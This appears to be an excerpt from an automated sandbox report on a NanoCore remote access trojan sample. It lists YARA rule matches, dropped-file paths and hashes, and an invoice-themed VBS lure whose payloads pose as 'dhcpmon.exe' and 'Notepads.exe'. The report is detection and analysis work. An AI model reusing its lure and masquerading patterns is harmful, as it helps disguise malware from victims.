            Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.27f1774.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_0234131A NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_023412DF NtQuerySystemInformation,
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_0004524A
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_022E2FA8
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_022E23A0
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_022E8788
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_022E3850
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_022EB56A
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_022E969B
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_022E9388
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_022E306F
            Source: C:\Users\user\AppData\Local\Temp\fi.exe | Code function: 4_2_022E944F
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 7_2_00C4524A
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 7_2_05433850
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 7_2_054323A0
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 7_2_05432FA8
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 7_2_0543306F
            Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\ame.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\fi.exe B9F40A82EB141D2C09E9FDF133B80DCEB4163C89471CEC7AF84DB2141C5D51A5
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\Notepads.exe C676638B019D810CE392CADCF8F0719F76F305D380D69BA93A6FC60A3F92E2C7
            Source: Invoice No F1019855_PDF.vbs | Initial sample: Strings found which are bigger than 50
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: fi.exe PID: 6616, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4a60000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 7.2.dhcpmon.exe.3223dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
